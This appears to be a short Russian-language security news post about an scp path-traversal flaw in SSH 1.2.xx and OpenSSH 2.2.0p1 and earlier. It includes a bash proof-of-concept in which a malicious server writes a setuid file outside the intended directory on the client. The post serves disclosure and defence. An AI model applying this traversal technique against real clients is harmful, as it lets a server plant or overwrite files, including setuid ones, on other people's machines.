Когда-бы не использовался scp для передачи файлов с удаленной машины на твой комп, scp-сервис может вызвать затирание случайных файлов законной scp инфой. Это, конечно, не есть "сквозная прореха" в защите, но, типа, эта лазейка может быть использована для распространения саморазмножающихся вирусов через компы 3-х лиц 🙂

Системы уязвимы:
SSH 1.2.xx
OpenSSH 2.2.0p1 и пред.

Системы не уязвимы:
Data Fellows SSH package

Код эксплоита:
Эксплоит в конечном итоге создает на удаленной машине файл, названный /tmp/ScpIsBuggy с setuid-привелегиями, который содержит 200 байт мусора.

#!/bin/bash
echo "D0755 0 ../../../../../../tmp/nope"
echo "D0755 0 ../../../../../../tmp"
echo "C4755 200 ScpIsBuggy"
dd if=/dev/urandom bs=200 count=1 2>/dev/null
dd if=/dev/zero bs=1 count=2 2>/dev/null

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии